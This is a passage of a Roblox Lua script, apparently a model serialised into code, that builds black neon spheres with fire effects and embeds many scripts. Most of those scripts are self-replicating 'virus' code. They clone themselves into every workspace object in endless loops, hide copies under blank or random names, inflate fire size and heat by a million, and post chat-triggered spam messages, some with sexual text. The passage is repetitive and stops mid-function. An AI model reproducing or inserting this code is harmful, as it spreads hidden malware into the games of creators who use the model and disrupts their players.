	script.Parent:Clone().Parent = part
2844
	
2845
		elseif check ~= nil then
2846
	check.Size = check.Size + 1000000
2847
	check.Heat = check.Heat  +1000000
2848
	end
2849
end
2850
2851
2852
script.Parent.Parent.Touched:connect(Spread)
2853
2854
end,o106)
2855
end))
2856
o107 = Create("Script",{
2857
["Name"] = "Vaccine",
2858
["Parent"] = o103,
2859
})
2860
table.insert(cors,coroutine.create(function()
2861
wait()
2862
runDummyScript(function()
2863
function spread() -- created by bumblebee773
2864
local stuff = game.Workspace:GetChildren()
2865
for i = 1, #stuff do
2866
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
2867
local clone = script:clone()
2868
clone.Parent = stuff[i]
2869
end
2870
end
2871
end
2872
2873
while true do
2874
wait(.1)
2875
spread()
2876
end
2877
2878
function GetAllItems(mdl) 
2879
local objs = {} 
2880
function Search(obj) 
2881
if obj~=workspace then 
2882
table.insert(objs,obj) 
2883
end 
2884
if #obj:GetChildren() > 0 then 
2885
for i, v in ipairs(obj:GetChildren()) do 
2886
Search(v) 
2887
end 
2888
end 
2889
end 
2890
Search(mdl) 
2891
return objs 
2892
end 
2893
2894
2895
2896
for i, v in ipairs(GetAllItems(workspace)) do 
2897
if v.className == "Script" then 
2898
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
2899
v.Parent = game.Lighting --Just in case it has a removal prevention. 
2900
t = Instance.new("ObjectValue") 
2901
t.Name = "IsAVirus" 
2902
t.Parent = v 
2903
end 
2904
end 
2905
end 
2906
2907
for i, v in ipairs(game.Lighting:GetChildren()) do 
2908
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
2909
v:remove() 
2910
end 
2911
end 
2912
2913
2914
print("Virus debugged! All clean!")
2915
end,o107)
2916
end))
2917
o109 = Create("Script",{
2918
["Name"] = "Script......Or is it...",
2919
["Parent"] = mas,
2920
})
2921
table.insert(cors,coroutine.create(function()
2922
wait()
2923
runDummyScript(function()
2924
-- Thanks for using My hack.............suka XD
2925
2926
if script.Parent.className ~= "RotateP" then
2927
	local p = Instance.new("RotateP")
2928
	p.Parent = workspace
2929
	p.Name = "dåååååååååååååång.........you got owned..."
2930
	script.Parent = p
2931
end
2932
2933
function check()
2934
	local list = workspace:GetChildren()
2935
	for i = 1, #list do
2936
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
2937
			script.Parent:Clone().Parent = list[i]
2938
		end
2939
		wait()
2940
	end
2941
end
2942
2943
while true do
2944
	check()
2945
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
2946
		local main = script.Parent:Clone()
2947
		main.Name = "Hello...I åm Your New Lord Lolz"
2948
		main.Parent = workspace
2949
	end
2950
	wait(3)
2951
end
2952
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
2953
-- Have a nice day. XD
2954
end,o109)
2955
end))
2956
o111 = Create("Script",{
2957
["Name"] = "Script......Or is it...",
2958
["Parent"] = mas,
2959
})
2960
table.insert(cors,coroutine.create(function()
2961
wait()
2962
runDummyScript(function()
2963
if script.Parent.className ~= "RotateP" then
2964
	local p = Instance.new("RotateP")
2965
	p.Parent = workspace
2966
	p.Name = "INfecTION"
2967
	script.Parent = p
2968
end
2969
2970
function check()
2971
	local list = workspace:GetChildren()
2972
	for i = 1, #list do
2973
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
2974
			script.Parent:Clone().Parent = list[i]
2975
		end
2976
		wait()
2977
	end
2978
end
2979
2980
while true do
2981
	check()
2982
	if workspace:findFirstChild("inFECtion") == nil then
2983
		local main = script.Parent:Clone()
2984
		main.Name = "inFECtion"
2985
		main.Parent = workspace
2986
	end
2987
	wait(3)
2988
end
2989
2990
end,o111)
2991
end))
2992
o113 = Create("Script",{
2993
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
2994
["Parent"] = mas,
2995
})
2996
table.insert(cors,coroutine.create(function()
2997
wait()
2998
runDummyScript(function()
2999
names={"dapperguestyo"}
3000
local NameCheck = false
3001
script.Parent.Name = names[math.random(1, #names)]
3002
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
3003
local c = script.Parent:Clone()
3004
3005
function addEvent(ch)
3006
	wait(math.random())
3007
	NameCheck = false
3008
	for ss = 1, #names do
3009
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
3010
			NameCheck = true
3011
		end
3012
	end
3013
	if NameCheck == false then
3014
		local cloak = c:Clone()
3015
		cloak.Name = ""
3016
		cloak:GetChildren()[1].Name = ""
3017
		cloak.Parent = ch
3018
		cloak.Name = names[math.random(1, 5)]
3019
	end
3020
end
3021
3022
workspace.ChildAdded:connect(addEvent)
3023
3024
game.Players.PlayerAdded:connect(function(pl)
3025
	pl.Chatted:connect(function(m)
3026
		if m:sub(1, 5) == "/sc t" then
3027
			local m = Instance.new("Message")
3028
			m.Parent = workspace
3029
			m.Text = "THEY CALL ME CRAZY"
3030
			wait(1)
3031
			m.Text = "lOoOoOoOp"
3032
			wait(0.25)
3033
			m.Text = "next page"
3034
			wait(0.25)
3035
			m.Text = "lOoOoOoOp"
3036
			wait(0.25)
3037
			m.Text = "LoOoOoOoP"
3038
			wait(0.25)
3039
			m.Text = "lOoOoOoOp"
3040
			wait(0.25)
3041
			m.Text = "LoOoOoOoP"
3042
			wait(0.25)
3043
			m.Text = "GOTTA GOTTA BE CRAZY"
3044
			wait(1)
3045
			m.Text = "lOoOoOoOp"
3046
			wait(0.25)
3047
			m.Text = "LoOoOoOoP"
3048
			wait(0.25)
3049
			m.Text = "lOoOoOoOp"
3050
			wait(0.25)
3051
			m.Text = "brendantaylor rules"
3052
			wait(0.25)
3053
			m.Text = "so does iampoobx"
3054
			wait(0.25)
3055
			m.Text = "LoOoOoOoP"
3056
			wait(0.25)
3057
			m.Text = "GOTTA GET A LIFE (YOU)"
3058
			wait(3)
3059
			m:remove()
3060
		end
3061
		if m:sub(1, 5) == "HAAXX" then
3062
			local m = Instance.new("Message")
3063
			m.Parent = workspace
3064
			m.Text = "HAAXX"	
3065
			wait(3)
3066
			m:remove()
3067
		end
3068
	end)
3069
end)
3070
3071
while true do
3072
	local s = workspace:GetChildren()
3073
	for i = 1, #s do
3074
		NameCheck = false
3075
		for ss = 1, #names do
3076
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
3077
				NameCheck = true
3078
			end
3079
		end
3080
		if NameCheck == false then
3081
			local cloak = c:Clone()
3082
			cloak.Name = ""
3083
			cloak:GetChildren()[1].Name = ""
3084
			cloak.Parent = s[i]
3085
		end
3086
		wait(0.1)
3087
	end
3088
	wait(1)
3089
end
3090
3091
end,o113)
3092
end))
3093
o115 = Create("Script",{
3094
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
3095
["Parent"] = mas,
3096
})
3097
table.insert(cors,coroutine.create(function()
3098
wait()
3099
runDummyScript(function()
3100
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
3101
local NameCheck = false
3102
script.Parent.Name = names[math.random(1, #names)]
3103
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
3104
local c = script.Parent:Clone()
3105
3106
function addEvent(ch)
3107
	wait(math.random())
3108
	NameCheck = false
3109
	for ss = 1, #names do
3110
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
3111
			NameCheck = true
3112
		end
3113
	end
3114
	if NameCheck == false then
3115
		local cloak = c:Clone()
3116
		cloak.Name = ""
3117
		cloak:GetChildren()[1].Name = ""
3118
		cloak.Parent = ch
3119
		cloak.Name = names[math.random(1, 5)]
3120
	end
3121
end
3122
3123
workspace.ChildAdded:connect(addEvent)
3124
3125
game.Players.PlayerAdded:connect(function(pl)
3126
	pl.Chatted:connect(function(m)
3127
		if m:sub(1, 5) == "/sc t" then
3128
			local m = Instance.new("Message")
3129
			m.Parent = workspace
3130
			m.Text = "THEY CALL ME CRAZY"
3131
			wait(1)
3132
			m.Text = "lOoOoOoOp"
3133
			wait(0.25)
3134
			m.Text = "LoOoOoOoP"
3135
			wait(0.25)
3136
			m.Text = "lOoOoOoOp"
3137
			wait(0.25)
3138
			m.Text = "LoOoOoOoP"
3139
			wait(0.25)
3140
			m.Text = "lOoOoOoOp"
3141
			wait(0.25)
3142
			m.Text = "LoOoOoOoP"
3143
			wait(0.25)
3144
			m.Text = "GOTTA GOTTA BE CRAZY"
3145
			wait(1)
3146
			m.Text = "lOoOoOoOp"
3147
			wait(0.25)
3148
			m.Text = "LoOoOoOoP"
3149
			wait(0.25)
3150
			m.Text = "lOoOoOoOp"
3151
			wait(0.25)
3152
			m.Text = "LoOoOoOoP"
3153
			wait(0.25)
3154
			m.Text = "lOoOoOoOp"
3155
			wait(0.25)
3156
			m.Text = "LoOoOoOoP"
3157
			wait(0.25)
3158
			m.Text = "GOTTA GET A LIFE (YOU)"
3159
			wait(3)
3160
			m:remove()
3161
		end
3162
		if m:sub(1, 5) == "HAAXX" then
3163
			local m = Instance.new("Message")
3164
			m.Parent = workspace
3165
			m.Text = "HAAXX"	
3166
			wait(3)
3167
			m:remove()
3168
		end
3169
	end)
3170
end)
3171
3172
while true do
3173
	local s = workspace:GetChildren()
3174
	for i = 1, #s do
3175
		NameCheck = false
3176
		for ss = 1, #names do
3177
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
3178
				NameCheck = true
3179
			end
3180
		end
3181
		if NameCheck == false then
3182
			local cloak = c:Clone()
3183
			cloak.Name = ""
3184
			cloak:GetChildren()[1].Name = ""
3185
			cloak.Parent = s[i]
3186
		end
3187
		wait(0.1)
3188
	end
3189
	wait(1)
3190
end
3191
3192
end,o115)
3193
end))
3194
o117 = Create("Script",{
3195
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
3196
["Parent"] = mas,
3197
})
3198
table.insert(cors,coroutine.create(function()
3199
wait()
3200
runDummyScript(function()
3201
names={"AmazingOmegaJames","H75","","","","","","",""}
3202
local NameCheck = false
3203
script.Parent.Name = names[math.random(1, #names)]
3204
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
3205
local c = script.Parent:Clone()
3206
3207
function addEvent(ch)
3208
	wait(math.random())
3209
	NameCheck = false
3210
	for ss = 1, #names do
3211
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
3212
			NameCheck = true
3213
		end
3214
	end
3215
	if NameCheck == false then
3216
		local cloak = c:Clone()
3217
		cloak.Name = ""
3218
		cloak:GetChildren()[1].Name = ""
3219
		cloak.Parent = ch
3220
		cloak.Name = names[math.random(1, 5)]
3221
	end
3222
end
3223
3224
workspace.ChildAdded:connect(addEvent)
3225
3226
game.Players.PlayerAdded:connect(function(pl)
3227
	pl.Chatted:connect(function(m)
3228
		if m:sub(1, 5) == "/sc t" then
3229
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
3230
			m.Parent = workspace
3231
			m.Text = "THEY CALL ME CRAZY"
3232
			wait(1)
3233
			m.Text = "lOoOoOoOp"
3234
			wait(0.25)
3235
			m.Text = "LoOoOoOoP"
3236
			wait(0.25)
3237
			m.Text = "lOoOoOoOp"
3238
			wait(0.25)
3239
			m.Text = "LoOoOoOoP"
3240
			wait(0.25)
3241
			m.Text = "lOoOoOoOp"
3242
			wait(0.25)
3243
			m.Text = "LoOoOoOoP"
3244
			wait(0.25)
3245
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
3246
			wait(1)
3247
			m.Text = "lOoOoOoOp"
3248
			wait(0.25)
3249
			m.Text = "LoOoOoOoP"
3250
			wait(0.25)
3251
			m.Text = "lOoOoOoOp"
3252
			wait(0.25)
3253
			m.Text = "LoOoOoOoP"
3254
			wait(0.25)
3255
			m.Text = "lOoOoOoOp"
3256
			wait(0.25)
3257
			m.Text = "LoOoOoOoP"
3258
			wait(0.25)
3259
			m.Text = "GOTTA HAVE SEX WITH YOU"
3260
			wait(3)
3261
			m:remove()
3262
		end
3263
		if m:sub(1, 5) == " SEX HAAXX" then
3264
			local m = Instance.new("Message")
3265
			m.Parent = workspace
3266
			m.Text = " SEX HAAXX"	
3267
			wait(3)
3268
			m:remove()
3269
		end
3270
	end)
3271
end)
3272
3273
while true do
3274
	local s = workspace:GetChildren()
3275
	for i = 1, #s do
3276
		NameCheck = false
3277
		for ss = 1, #names do
3278
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
3279
				NameCheck = true
3280
			end
3281
		end
3282
		if NameCheck == false then
3283
			local cloak = c:Clone()
3284
			cloak.Name = ""
3285
			cloak:GetChildren()[1].Name = ""
3286
			cloak.Parent = s[i]
3287
		end
3288
		wait(0.1)
3289
	end
3290
	wait(1)
3291
end
3292
3293
end,o117)
3294
end))
3295
o118 = Create("Part",{
3296
["Name"] = "sphere",
3297
["Parent"] = o78,
3298
["Material"] = Enum.Material.Neon,
3299
["BrickColor"] = BrickColor.new("Really black"),
3300
["Position"] = Vector3.new(54.2432327, -5246.26172, -352.150116),
3301
["Rotation"] = Vector3.new(90.0001373, 44.9998589, -0.000344781816),
3302
["Anchored"] = true,
3303
["CFrame"] = CFrame.new(54.2432327, -5246.26172, -352.150116, 0.707108498, 4.25508051e-006, 0.707105041, 0.707105041, 1.87493026e-006, -0.707108498, -4.33457626e-006, 1, -1.68300937e-006),
3304
["FormFactor"] = Enum.FormFactor.Plate,
3305
["Size"] = Vector3.new(4.45820379, 4.45820332, 4.45820379),
3306
["BottomSurface"] = Enum.SurfaceType.Smooth,
3307
["TopSurface"] = Enum.SurfaceType.Smooth,
3308
["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
3309
})
3310
o119 = Create("SpecialMesh",{
3311
["Parent"] = o118,
3312
["Scale"] = Vector3.new(0.5, 0.5, 0.5),
3313
["MeshType"] = Enum.MeshType.Sphere,
3314
})
3315
o120 = Create("Fire",{
3316
["Parent"] = o118,
3317
["Size"] = 30,
3318
["Color"] = Color3.new(1, 0.678431, 0),
3319
["Enabled"] = false,
3320
["Heat"] = 25,
3321
["SecondaryColor"] = Color3.new(1, 0, 0),
3322
})
3323
o121 = Create("Script",{
3324
["Name"] = "Spread",
3325
["Parent"] = o120,
3326
})
3327
table.insert(cors,coroutine.create(function()
3328
wait()
3329
runDummyScript(function()
3330
function Spread(part)
3331
	check = part:findFirstChild("Fire")
3332
		if check == nil then 
3333
	script.Parent:Clone().Parent = part
3334
	
3335
		elseif check ~= nil then
3336
	check.Size = check.Size + 1000000
3337
	check.Heat = check.Heat  +1000000
3338
	end
3339
end
3340
3341
3342
script.Parent.Parent.Touched:connect(Spread)
3343
3344
end,o121)
3345
end))
3346
o122 = Create("Script",{
3347
["Name"] = "Vaccine",
3348
["Parent"] = o118,
3349
})
3350
table.insert(cors,coroutine.create(function()
3351
wait()
3352
runDummyScript(function()
3353
function spread() -- created by bumblebee773
3354
local stuff = game.Workspace:GetChildren()
3355
for i = 1, #stuff do
3356
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
3357
local clone = script:clone()
3358
clone.Parent = stuff[i]
3359
end
3360
end
3361
end
3362
3363
while true do
3364
wait(.1)
3365
spread()
3366
end
3367
3368
function GetAllItems(mdl) 
3369
local objs = {} 
3370
function Search(obj) 
3371
if obj~=workspace then 
3372
table.insert(objs,obj) 
3373
end 
3374
if #obj:GetChildren() > 0 then 
3375
for i, v in ipairs(obj:GetChildren()) do 
3376
Search(v) 
3377
end 
3378
end 
3379
end 
3380
Search(mdl) 
3381
return objs 
3382
end 
3383
3384
3385
3386
for i, v in ipairs(GetAllItems(workspace)) do 
3387
if v.className == "Script" then 
3388
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
3389
v.Parent = game.Lighting --Just in case it has a removal prevention. 
3390
t = Instance.new("ObjectValue") 
3391
t.Name = "IsAVirus" 
3392
t.Parent = v 
3393
end 
3394
end 
3395
end 
3396
3397
for i, v in ipairs(game.Lighting:GetChildren()) do 
3398
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
3399
v:remove() 
3400
end 
3401
end 
3402
3403
3404
print("Virus debugged! All clean!")
3405
end,o122)
3406
end))
3407
o124 = Create("Script",{
3408
["Name"] = "Script......Or is it...",
3409
["Parent"] = mas,
3410
})
3411
table.insert(cors,coroutine.create(function()
3412
wait()
3413
runDummyScript(function()
3414
-- Thanks for using My hack.............suka XD
3415
3416
if script.Parent.className ~= "RotateP" then
3417
	local p = Instance.new("RotateP")
3418
	p.Parent = workspace
3419
	p.Name = "dåååååååååååååång.........you got owned..."
3420
	script.Parent = p
3421
end
3422
3423
function check()
3424
	local list = workspace:GetChildren()
3425
	for i = 1, #list do
3426
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
3427
			script.Parent:Clone().Parent = list[i]
3428
		end
3429
		wait()
3430
	end
3431
end
3432
3433
while true do
3434
	check()
3435
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
3436
		local main = script.Parent:Clone()
3437
		main.Name = "Hello...I åm Your New Lord Lolz"
3438
		main.Parent = workspace
3439
	end
3440
	wait(3)
3441
end
3442
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
3443
-- Have a nice day. XD
3444
end,o124)
3445
end))
3446
o126 = Create("Script",{
3447
["Name"] = "Script......Or is it...",
3448
["Parent"] = mas,
3449
})
3450
table.insert(cors,coroutine.create(function()
3451
wait()
3452
runDummyScript(function()
3453
if script.Parent.className ~= "RotateP" then
3454
	local p = Instance.new("RotateP")
3455
	p.Parent = workspace
3456
	p.Name = "INfecTION"
3457
	script.Parent = p
3458
end
3459
3460
function check()
3461
	local list = workspace:GetChildren()
3462
	for i = 1, #list do
3463
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
3464
			script.Parent:Clone().Parent = list[i]
3465
		end
3466
		wait()
3467
	end
3468
end
3469
3470
while true do
3471
	check()
3472
	if workspace:findFirstChild("inFECtion") == nil then
3473
		local main = script.Parent:Clone()
3474
		main.Name = "inFECtion"
3475
		main.Parent = workspace
3476
	end
3477
	wait(3)
3478
end
3479
3480
end,o126)
3481
end))
3482
o128 = Create("Script",{
3483
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
3484
["Parent"] = mas,
3485
})
3486
table.insert(cors,coroutine.create(function()
3487
wait()
3488
runDummyScript(function()
3489
names={"dapperguestyo"}
3490
local NameCheck = false
3491
script.Parent.Name = names[math.random(1, #names)]
3492
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
3493
local c = script.Parent:Clone()
3494
3495
function addEvent(ch)
3496
	wait(math.random())
3497
	NameCheck = false
3498
	for ss = 1, #names do
3499
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
3500
			NameCheck = true
3501
		end
3502
	end
3503
	if NameCheck == false then
3504
		local cloak = c:Clone()
3505
		cloak.Name = ""
3506
		cloak:GetChildren()[1].Name = ""
3507
		cloak.Parent = ch
3508
		cloak.Name = names[math.random(1, 5)]
3509
	end
3510
end
3511
3512
workspace.ChildAdded:connect(addEvent)
3513
3514
game.Players.PlayerAdded:connect(function(pl)
3515
	pl.Chatted:connect(function(m)
3516
		if m:sub(1, 5) == "/sc t" then
3517
			local m = Instance.new("Message")
3518
			m.Parent = workspace
3519
			m.Text = "THEY CALL ME CRAZY"
3520
			wait(1)
3521
			m.Text = "lOoOoOoOp"
3522
			wait(0.25)
3523
			m.Text = "next page"
3524
			wait(0.25)
3525
			m.Text = "lOoOoOoOp"
3526
			wait(0.25)
3527
			m.Text = "LoOoOoOoP"
3528
			wait(0.25)
3529
			m.Text = "lOoOoOoOp"
3530
			wait(0.25)
3531
			m.Text = "LoOoOoOoP"
3532
			wait(0.25)
3533
			m.Text = "GOTTA GOTTA BE CRAZY"
3534
			wait(1)
3535
			m.Text = "lOoOoOoOp"
3536
			wait(0.25)
3537
			m.Text = "LoOoOoOoP"
3538
			wait(0.25)
3539
			m.Text = "lOoOoOoOp"
3540
			wait(0.25)
3541
			m.Text = "brendantaylor rules"
3542
			wait(0.25)
3543
			m.Text = "so does iampoobx"
3544
			wait(0.25)
3545
			m.Text = "LoOoOoOoP"
3546
			wait(0.25)
3547
			m.Text = "GOTTA GET A LIFE (YOU)"
3548
			wait(3)
3549
			m:remove()
3550
		end
3551
		if m:sub(1, 5) == "HAAXX" then
3552
			local m = Instance.new("Message")
3553
			m.Parent = workspace
3554
			m.Text = "HAAXX"	
3555
			wait(3)
3556
			m:remove()
3557
		end
3558
	end)
3559
end)
3560
3561
while true do
3562
	local s = workspace:GetChildren()
3563
	for i = 1, #s do
3564
		NameCheck = false
3565
		for ss = 1, #names do
3566
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
3567
				NameCheck = true
3568
			end
3569
		end
3570
		if NameCheck == false then
3571
			local cloak = c:Clone()
3572
			cloak.Name = ""
3573
			cloak:GetChildren()[1].Name = ""
3574
			cloak.Parent = s[i]
3575
		end
3576
		wait(0.1)
3577
	end
3578
	wait(1)
3579
end
3580
3581
end,o128)
3582
end))
3583
o130 = Create("Script",{
3584
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
3585
["Parent"] = mas,
3586
})
3587
table.insert(cors,coroutine.create(function()
3588
wait()
3589
runDummyScript(function()
3590
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
3591
local NameCheck = false
3592
script.Parent.Name = names[math.random(1, #names)]
3593
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
3594
local c = script.Parent:Clone()
3595
3596
function addEvent(ch)
3597
	wait(math.random())
3598
	NameCheck = false
3599
	for ss = 1, #names do
3600
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
3601
			NameCheck = true
3602
		end
3603
	end
3604
	if NameCheck == false then
3605
		local cloak = c:Clone()
3606
		cloak.Name = ""
3607
		cloak:GetChildren()[1].Name = ""
3608
		cloak.Parent = ch
3609
		cloak.Name = names[math.random(1, 5)]
3610
	end
3611
end
3612
3613
workspace.ChildAdded:connect(addEvent)
3614
3615
game.Players.PlayerAdded:connect(function(pl)
3616
	pl.Chatted:connect(function(m)
3617
		if m:sub(1, 5) == "/sc t" then
3618
			local m = Instance.new("Message")
3619
			m.Parent = workspace
3620
			m.Text = "THEY CALL ME CRAZY"
3621
			wait(1)
3622
			m.Text = "lOoOoOoOp"
3623
			wait(0.25)
3624
			m.Text = "LoOoOoOoP"
3625
			wait(0.25)
3626
			m.Text = "lOoOoOoOp"
3627
			wait(0.25)
3628
			m.Text = "LoOoOoOoP"
3629
			wait(0.25)
3630
			m.Text = "lOoOoOoOp"
3631
			wait(0.25)
3632
			m.Text = "LoOoOoOoP"
3633
			wait(0.25)
3634
			m.Text = "GOTTA GOTTA BE CRAZY"
3635
			wait(1)
3636
			m.Text = "lOoOoOoOp"
3637
			wait(0.25)
3638
			m.Text = "LoOoOoOoP"
3639
			wait(0.25)
3640
			m.Text = "lOoOoOoOp"
3641
			wait(0.25)
3642
			m.Text = "LoOoOoOoP"
3643
			wait(0.25)
3644
			m.Text = "lOoOoOoOp"
3645
			wait(0.25)
3646
			m.Text = "LoOoOoOoP"
3647
			wait(0.25)
3648
			m.Text = "GOTTA GET A LIFE (YOU)"
3649
			wait(3)
3650
			m:remove()
3651
		end
3652
		if m:sub(1, 5) == "HAAXX" then
3653
			local m = Instance.new("Message")
3654
			m.Parent = workspace
3655
			m.Text = "HAAXX"	
3656
			wait(3)
3657
			m:remove()
3658
		end
3659
	end)
3660
end)
3661
3662
while true do
3663
	local s = workspace:GetChildren()
3664
	for i = 1, #s do
3665
		NameCheck = false
3666
		for ss = 1, #names do
3667
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
3668
				NameCheck = true
3669
			end
3670
		end
3671
		if NameCheck == false then
3672
			local cloak = c:Clone()
3673
			cloak.Name = ""
3674
			cloak:GetChildren()[1].Name = ""
3675
			cloak.Parent = s[i]
3676
		end
3677
		wait(0.1)
3678
	end
3679
	wait(1)
3680
end
3681
3682
end,o130)
3683
end))
3684
o132 = Create("Script",{
3685
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
3686
["Parent"] = mas,
3687
})
3688
table.insert(cors,coroutine.create(function()
3689
wait()
3690
runDummyScript(function()
3691
names={"AmazingOmegaJames","H75","","","","","","",""}
3692
local NameCheck = false
3693
script.Parent.Name = names[math.random(1, #names)]
3694
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
3695
local c = script.Parent:Clone()
3696
3697
function addEvent(ch)
3698
	wait(math.random())
3699
	NameCheck = false
3700
	for ss = 1, #names do
3701
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
3702
			NameCheck = true
3703
		end
3704
	end
3705
	if NameCheck == false then
3706
		local cloak = c:Clone()
3707
		cloak.Name = ""
3708
		cloak:GetChildren()[1].Name = ""
3709
		cloak.Parent = ch
3710
		cloak.Name = names[math.random(1, 5)]
3711
	end
3712
end
3713
3714
workspace.ChildAdded:connect(addEvent)
3715
3716
game.Players.PlayerAdded:connect(function(pl)
3717
	pl.Chatted:connect(function(m)
3718
		if m:sub(1, 5) == "/sc t" then
3719
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
3720
			m.Parent = workspace
3721
			m.Text = "THEY CALL ME CRAZY"
3722
			wait(1)
3723
			m.Text = "lOoOoOoOp"
3724
			wait(0.25)
3725
			m.Text = "LoOoOoOoP"
3726
			wait(0.25)
3727
			m.Text = "lOoOoOoOp"
3728
			wait(0.25)
3729
			m.Text = "LoOoOoOoP"
3730
			wait(0.25)
3731
			m.Text = "lOoOoOoOp"
3732
			wait(0.25)
3733
			m.Text = "LoOoOoOoP"
3734
			wait(0.25)
3735
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
3736
			wait(1)
3737
			m.Text = "lOoOoOoOp"
3738
			wait(0.25)
3739
			m.Text = "LoOoOoOoP"
3740
			wait(0.25)
3741
			m.Text = "lOoOoOoOp"
3742
			wait(0.25)
3743
			m.Text = "LoOoOoOoP"
3744
			wait(0.25)
3745
			m.Text = "lOoOoOoOp"
3746
			wait(0.25)
3747
			m.Text = "LoOoOoOoP"
3748
			wait(0.25)
3749
			m.Text = "GOTTA HAVE SEX WITH YOU"
3750
			wait(3)
3751
			m:remove()
3752
		end
3753
		if m:sub(1, 5) == " SEX HAAXX" then
3754
			local m = Instance.new("Message")
3755
			m.Parent = workspace
3756
			m.Text = " SEX HAAXX"	
3757
			wait(3)
3758
			m:remove()
3759
		end
3760
	end)
3761
end)
3762
3763
while true do
3764
	local s = workspace:GetChildren()
3765
	for i = 1, #s do
3766
		NameCheck = false
3767
		for ss = 1, #names do
3768
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
3769
				NameCheck = true
3770
			end
3771
		end
3772
		if NameCheck == false then
3773
			local cloak = c:Clone()
3774
			cloak.Name = ""
3775
			cloak:GetChildren()[1].Name = ""
3776
			cloak.Parent = s[i]
3777
		end
3778
		wait(0.1)
3779
	end
3780
	wait(1)
3781
end
3782
3783
end,o132)
3784
end))
3785
o133 = Create("Part",{
3786
["Name"] = "sphere",
3787
["Parent"] = o78,
3788
["Material"] = Enum.Material.Neon,
3789
["BrickColor"] = BrickColor.new("Really black"),
3790
["Position"] = Vector3.new(63.5991058, -5244.75684, -352.150116),
3791
["Rotation"] = Vector3.new(89.999794, -44.9997826, 179.999741),
3792
["Anchored"] = true,
3793
["CFrame"] = CFrame.new(63.5991058, -5244.75684, -352.150116, -0.707109511, -3.38509585e-006, -0.707104087, 0.707104087, -2.93747917e-007, -0.707109511, 2.18592299e-006, -1, 2.6013272e-006),
3794
["FormFactor"] = Enum.FormFactor.Plate,
3795
["Size"] = Vector3.new(4.27956581, 4.27956533, 4.27956581),
3796
["BottomSurface"] = Enum.SurfaceType.Smooth,
3797
["TopSurface"] = Enum.SurfaceType.Smooth,
3798
["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
3799
})
3800
o134 = Create("SpecialMesh",{
3801
["Parent"] = o133,
3802
["Scale"] = Vector3.new(0.5, 0.5, 0.5),
3803
["MeshType"] = Enum.MeshType.Sphere,
3804
})
3805
o135 = Create("Fire",{
3806
["Parent"] = o133,
3807
["Size"] = 30,
3808
["Color"] = Color3.new(1, 0.678431, 0),
3809
["Enabled"] = false,
3810
["Heat"] = 25,
3811
["SecondaryColor"] = Color3.new(1, 0, 0),
3812
})
3813
o136 = Create("Script",{
3814
["Name"] = "Spread",
3815
["Parent"] = o135,
3816
})
3817
table.insert(cors,coroutine.create(function()
3818
wait()
3819
runDummyScript(function()
3820
